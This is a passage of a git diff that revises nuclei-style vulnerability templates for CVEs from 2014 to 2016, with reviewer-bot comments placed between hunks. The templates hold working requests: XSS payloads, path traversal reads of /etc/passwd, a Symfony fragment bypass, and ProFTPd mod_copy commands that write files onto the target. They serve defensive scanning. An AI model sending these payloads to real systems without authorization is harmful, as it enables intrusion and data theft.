@@ -23,12 +42,15 @@ requests: - "PHP Extension" - "PHP Version" condition: and + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' +# digest: 4b0a004830460221008c1bf333cfd76bc1b8abe4d716b5d045a115773a13bf9c487b70ca6568a5453d022100bcd49d59f04cb8ff2b70044e42c84441763702e1747eabad6a6ceee3797fdd7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-9606.yaml b/poc/cve/CVE-2014-9606.yaml index 0dbcbe73af..ab55ff5dbd 100644 --- a/poc/cve/CVE-2014-9606.yaml +++ b/poc/cve/CVE-2014-9606.yaml @@ -1,9 +1,12 @@ id: CVE-2014-9606 + info: name: Netsweeper 4.0.8 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 
@@ -13,23 +16,33 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss -requests: + epss-score: 0.00102 + epss-percentile: 0.4145 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,xss,packetstorm,cve + +http: - method: GET path: - '{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word part: body words: - '' + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 +# digest: 4b0a00483046022100d38dd898ec847c0430b640c24b7c8eb49c1e87ae8c9b02d58ae693f983aa44bf022100a9b9e61e7a20d1689a4e5157073c1f40c71e78658596a4b07179baef41904a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-9609.yaml b/poc/cve/CVE-2014-9609.yaml index 14e19e8e0e..5c93b18125 100644 --- a/poc/cve/CVE-2014-9609.yaml +++ b/poc/cve/CVE-2014-9609.yaml 
@@ -5,17 +5,27 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + remediation: | + Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 - tags: cve,cve2014,netsweeper,lfi + epss-score: 0.00153 + epss-percentile: 0.51516 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,lfi,packetstorm,cve -requests: +http: - method: GET path: - "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd" @@ -29,5 +39,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 +# digest: 4a0a00473045022100a029392227a12d3f7540f8228711c6fb2fd02361d9d66b96a82388722893621402200f217f5009814d1ce8b8ded603f0155cb302e0cd2b05ea19f96e58466d748992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-0554.yaml b/poc/cve/CVE-2015-0554.yaml index a812e5fc89..af65820b4d 100644 --- a/poc/cve/CVE-2015-0554.yaml +++ b/poc/cve/CVE-2015-0554.yaml @@ -1,5 +1,4 @@ id: CVE-2015-0554 - info: name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure author: daffainfo 
@@ -13,12 +12,10 @@ info: classification: cve-id: CVE-2015-0554 tags: cve,cve2015,pirelli,router,disclosure - requests: - method: GET path: - "{{BaseURL}}/wlsecurity.html" - matchers-condition: and matchers: - type: word @@ -28,7 +25,6 @@ requests: - "var WscDevPin" - "var sessionkey" condition: and - - type: status status: - 200 diff --git a/poc/cve/CVE-2015-1880.yaml b/poc/cve/CVE-2015-1880.yaml index 0086f66e71..324c752a09 100644 --- a/poc/cve/CVE-2015-1880.yaml +++ b/poc/cve/CVE-2015-1880.yaml 
@@ -1,50 +1,31 @@ id: CVE-2015-1880 - info: - name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting + name: XSS in Fortigates SSL VPN login page author: pikpikcu severity: medium - description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. - remediation: | - Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability. + description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - - http://www.securitytracker.com/id/1032261 - - http://www.securitytracker.com/id/1032262 + - http://www.securityfocus.com/bid/74652 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 cve-id: CVE-2015-1880 - cwe-id: CWE-79 - epss-score: 0.00201 - epss-percentile: 0.5792 - cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: fortinet - product: fortios - tags: cve,cve2015,xss,fortigates,intrusive - -http: + tags: cve,cve2015,xss,fortigates,ssl +requests: - method: GET path: - "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en" - matchers-condition: and matchers: - type: word - part: body - words: - - - - - type: word - part: header words: - - text/html - + - "" + part: body - type: status status: - 200 -# digest: 4b0a00483046022100a7fc158a503a1219f2db09ae4dfeceb2c792dcca641f60b5d808fb025b4e75d0022100cb02049f449f45b507e2f2be40b9d02b533fad928082a572fd418849e582ccd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + 
- type: word + words: + - "text/html" + part: header diff --git a/poc/cve/CVE-2015-2166.yaml b/poc/cve/CVE-2015-2166.yaml index 34f14e9085..143042641b 100644 --- a/poc/cve/CVE-2015-2166.yaml +++ b/poc/cve/CVE-2015-2166.yaml @@ -3,30 +3,18 @@ id: CVE-2015-2166 info: name: Ericsson Drutt MSDP - Local File Inclusion author: daffainfo - severity: medium + severity: high description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application. reference: - https://www.exploit-db.com/exploits/36619 - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html - - https://www.exploit-db.com/exploits/36619/ + - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N - cvss-score: 5 cve-id: CVE-2015-2166 - cwe-id: CWE-22 - epss-score: 0.23272 - epss-percentile: 0.96075 - cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ericsson - product: drutt_mobile_service_delivery_platform - tags: cve,cve2015,lfi,ericsson,edb,packetstorm + tags: cve,cve2015,lfi,ericsson -http: +requests: - method: GET path: - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" @@ -41,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d59b5607d6615416be4f3aadc82eff16262283d2a6125a49d37667b22d3c35da02202bdded26fca10bd7ddcdd4cfde587e8953f0b45861313b66df6c8d1b8f0725ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/08 
diff --git a/poc/cve/CVE-2015-3306.yaml b/poc/cve/CVE-2015-3306.yaml index 10bd304d45..7ac40dbb62 100644 --- a/poc/cve/CVE-2015-3306.yaml +++ b/poc/cve/CVE-2015-3306.yaml 
@@ -1,48 +1,32 @@ id: CVE-2015-3306 info: - name: ProFTPd - Remote Code Execution + name: ProFTPd RCE author: pdteam - severity: critical - description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - reference: - - https://github.com/t0kx/exploit-CVE-2015-3306 - - https://www.exploit-db.com/exploits/36803/ - - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html - - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-3306 - remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. + severity: high + reference: https://github.com/t0kx/exploit-CVE-2015-3306 + description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C - cvss-score: 10 cve-id: CVE-2015-3306 - cwe-id: CWE-284 - cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:* - epss-score: 0.97267 - metadata: - max-request: 1 - product: proftpd - vendor: proftpd - tags: cve,cve2015,ftp,rce,network,proftpd,edb -tcp: - - host: - - "{{Hostname}}" - port: 21 - inputs: + tags: cve,cve2015,ftp,rce,network,proftpd + +network: + - inputs: - data: "site cpfr /proc/self/cmdline\r\n" read: 1024 - - data: "site cpto /tmp/.{{randstr}}\r\n" read: 1024 - - data: "site cpfr /tmp/.{{randstr}}\r\n" read: 1024 - - data: "site cpto /var/www/html/{{randstr}}\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:21" + read-size: 1024 matchers: - type: word part: raw words: - "Copy successful" -# digest: 4a0a0047304502206e4bbacac7407e920b69b12bf1aacc542accbac3da13c2629ef972c3ce196a1f0221009930383e17cc9739da76a80ff0385edeca9954e833de43678ce3e5f6ebb3c02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
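Review bot: The rewritten `network:` block still copies files onto the scanned host (`/tmp/.{{randstr}}` and `/var/www/html/{{randstr}}`) and nothing in the template removes them, yet the tag line gives operators no way to exclude it from non-intrusive scans; I would write `tags: cve,cve2015,ftp,rce,network,proftpd,intrusive`. The hunk also replaces the single `{{Hostname}}` host plus `port: 21` with two host entries, `{{Hostname}}` and `{{Host}}:21`, so the write sequence presumably runs once per entry and the first may reach whatever port the input carried rather than FTP. Keeping one host entry with the explicit port would confine the check to a single FTP session.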
diff --git a/poc/cve/CVE-2015-4050.yaml b/poc/cve/CVE-2015-4050.yaml index 148993a3f7..a56e9847ee 100644 --- a/poc/cve/CVE-2015-4050.yaml +++ b/poc/cve/CVE-2015-4050.yaml 
@@ -1,33 +1,16 @@ id: CVE-2015-4050 info: - name: Symfony - Authentication Bypass + name: ESI unauthorized access author: ELSFA7110,meme-lord - severity: medium - description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. - remediation: | - Apply the latest security patches or upgrade to a non-vulnerable version of Symfony. + severity: high + description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment. + tags: cve,cve2015,symfony,rce reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - - http://www.debian.org/security/2015/dsa-3276 - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 - - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 - cve-id: CVE-2015-4050 - cwe-id: CWE-284 - epss-score: 0.00847 - epss-percentile: 0.80236 - cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sensiolabs - product: symfony - tags: cve,cve2015,symfony,rce -http: +requests: - method: GET path: - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" 
@@ -35,11 +18,10 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "PHP Credits" + part: body - type: status status: - 200 -# digest: 4b0a0048304602210081f82a85652b23ff5cb7c8eb10b4feb081dd997c6da724a991cd0b418810cf19022100f1f997a79929ad657a8ec60cc084d142c5fafe68d3c8880a8a50c8f0671de048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-5471.yaml b/poc/cve/CVE-2015-5471.yaml index 151b25e771..37ed1b5e40 100644 --- a/poc/cve/CVE-2015-5471.yaml +++ b/poc/cve/CVE-2015-5471.yaml 
@@ -1,40 +1,28 @@ id: CVE-2015-5471 - info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko severity: medium - description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. - remediation: Upgrade to Swim Team version 1.45 or newer. + description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html - - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/ + tags: cve,cve2015,wordpress,wp-plugin,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2015-5471 cwe-id: CWE-22 - epss-score: 0.08185 - epss-percentile: 0.93681 - cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: swim_team_project - product: swim_team - framework: wordpress - google-query: inurl:"/wp-content/plugins/wp-swimteam" - tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" @@ -42,4 +30,3 @@ http: - type: status status: - 200 -# digest: 490a004630440220160c54578ec6aff888716cb92bfc490c74467330aa72d5b20d5575efe59709db0220798fefcb9df2f0868b45964c6869cb83066a899a4cd5624a5ef9acacdb4a796f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
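Review bot: The new `description` in CVE-2015-5471 ("doesnt sanitize user input from downloading sensitive system files") is hard to parse, and the first hunk also drops the `remediation` line, so a finding from this template no longer tells the site owner what to do. I would write `description: download.php in the Swim Team plugin does not validate the requested file path, which lets unauthenticated users retrieve arbitrary files.` and keep `remediation: Upgrade to Swim Team version 1.45 or newer.` from the old side.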
diff --git a/poc/cve/CVE-2015-6544.yaml b/poc/cve/CVE-2015-6544.yaml index e471c63d3d..23b0e18646 100644 --- a/poc/cve/CVE-2015-6544.yaml +++ b/poc/cve/CVE-2015-6544.yaml @@ -1,33 +1,20 @@ id: CVE-2015-6544 info: - name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting + name: iTop XSS author: pikpikcu severity: medium description: | - Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - remediation: | - Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability. - reference: - - https://www.htbridge.com/advisory/HTB23268 - - http://sourceforge.net/p/itop/tickets/1114/ - - http://sourceforge.net/p/itop/code/3662/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + tags: cve,cve2015,xss,itop classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2015-6544 cwe-id: CWE-79 - epss-score: 0.00284 - epss-percentile: 0.65225 - cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: combodo - product: itop - tags: cve,cve2015,xss,itop -http: +requests: - method: GET path: - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
@@ -35,16 +22,15 @@ http: matchers-condition: and matchers: - type: word - part: body words: - '' + part: body + + - type: status + status: + - 200 - type: word part: header words: - text/html - - - type: status - status: - - 200 -# digest: 490a0046304402207e5cb770ae6ceea5c16f60ae5dfabeb7adfc11cf13392ed8fb070dba9717d08a02207c4cec7e8d3894b7ab0b04b66d8c697000f5d44c0fa9d9fc5fbbd4b09566e4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-7780.yaml b/poc/cve/CVE-2015-7780.yaml index 789c902cf2..4b0f943e88 100644 --- a/poc/cve/CVE-2015-7780.yaml +++ b/poc/cve/CVE-2015-7780.yaml 
@@ -1,36 +1,51 @@ id: CVE-2015-7780 + info: - name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal + name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion author: daffainfo severity: medium - description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0. + description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. + remediation: | + Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/35933 - - https://www.cvedetails.com/cve/CVE-2015-7780/ - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html - http://jvn.jp/en/jp/JVN21968837/index.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-7780 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 - tags: cve,cve2015,lfi,manageengine -requests: + epss-score: 0.00151 + epss-percentile: 0.5124 + cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_firewall_analyzer + tags: manageengine,edb,cve,cve2015,lfi + +http: - method: GET path: - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "" - "java.sun.com" - part: body condition: and + - type: word part: header words: - "application/xml" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a3460c414ae18ac8eff64de9a7ee0cbabf0e078d51e53aa4cb77a997ab0471c6022019cc75eb07d69f3028ccfd527b99829e7841e5af3b8906bbdec67f0d55e6317d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000126.yaml b/poc/cve/CVE-2016-1000126.yaml index 7570661517..902c9828d1 100644 --- a/poc/cve/CVE-2016-1000126.yaml +++ b/poc/cve/CVE-2016-1000126.yaml 
@@ -1,19 +1,33 @@ id: CVE-2016-1000126 info: - name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) + name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 + - https://wordpress.org/plugins/admin-font-editor + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" + epss-score: 0.00119 + epss-percentile: 0.45801 + cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: admin-font-editor_project + product: admin-font-editor + framework: wordpress + google-query: inurl:"/wp-content/plugins/admin-font-editor" + tags: cve,cve2016,wordpress,xss,wp-plugin -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -21,9 +35,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header 
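Review bot: The added `remediation` text in the first hunk, "Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher)", contradicts the template's own name and description, which list 1.8 itself as affected (`<=1.8`). Followed literally, it leaves a site on a vulnerable release. The page does not name a fixed version, so I would word it as `Update the Admin Font Editor plugin to a release later than 1.8, or remove the plugin if none is available.`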
@@ -33,3 +47,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100dabba5cc345af910716530906eccc7ec8597d084a6c713b6dcb3f5774481209502201de0d8704d2fec448eca4c295d9111b6faa7a78091f2f9231364a6c4fac16b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000128.yaml b/poc/cve/CVE-2016-1000128.yaml index 51419b8676..61bfd4d41f 100644 --- a/poc/cve/CVE-2016-1000128.yaml +++ b/poc/cve/CVE-2016-1000128.yaml 
@@ -1,50 +1,32 @@ id: CVE-2016-1000128 - info: - name: WordPress anti-plagiarism <=3.60 - Cross-Site Scripting + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting. - remediation: | - Update the WordPress anti-plagiarism plugin to version >3.60 or apply the latest security patches provided by the vendor. + description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49889 - cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: anti-plagiarism_project - product: anti-plagiarism - framework: wordpress - google-query: inurl:"/wp-content/plugins/anti-plagiarism" tags: cve,cve2016,wordpress,xss,wp-plugin - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - "" - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a00463044022054b6a93873f8117ed464b6ee0b2fb2d4b93270219f5e9abbf8a961b8c70b67f502206c156ce0d20ff92dc5677b0c1d726955ec4b4640de551e2afd7d668af5976c00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000132.yaml b/poc/cve/CVE-2016-1000132.yaml index 042fb30874..df36a3068e 100644 --- a/poc/cve/CVE-2016-1000132.yaml +++ b/poc/cve/CVE-2016-1000132.yaml 
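Review bot: `description: Reflected XSS in wordpress plugin anti-plagiarism v3.60` only restates the name, and the hunk removes `remediation` and the NVD reference, so the report produced from this template says neither what the impact is nor how to fix it. The CVE-2016-1000132, CVE-2016-1000134 and CVE-2016-1000143 sections get the same one-line description with `remediation` removed. I would keep a remediation line such as `remediation: Update the anti-plagiarism plugin to a version later than 3.60.` and restore `- https://nvd.nist.gov/vuln/detail/CVE-2016-1000128` under `reference`.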
@@ -1,33 +1,25 @@ id: CVE-2016-1000132 info: - name: WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability. + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - https://wordpress.org/plugins/enhanced-tooltipglossary - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000132 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45205 - cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: cminds - product: tooltip_glossary - framework: wordpress google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" tags: cve,cve2016,wordpress,xss,wp-plugin -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" @@ -35,9 +27,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header 
@@ -47,4 +39,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c51eb02b55ee8351b095e66fd40d6e82a2c34175823525c78a617a78cec7cb810221009cadacb6a5bfe65f3484c61f990dd5b24c740e53cf58dc5e1d87499aea9e8872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000134.yaml b/poc/cve/CVE-2016-1000134.yaml index b9bf608cea..d781de2ee0 100644 --- a/poc/cve/CVE-2016-1000134.yaml +++ b/poc/cve/CVE-2016-1000134.yaml 
@@ -1,33 +1,25 @@ id: CVE-2016-1000134 info: - name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting + name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php author: daffainfo severity: medium - description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability. + description: Reflected XSS in wordpress plugin hdw-tube v1.2 reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - https://wordpress.org/plugins/hdw-tube - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + - 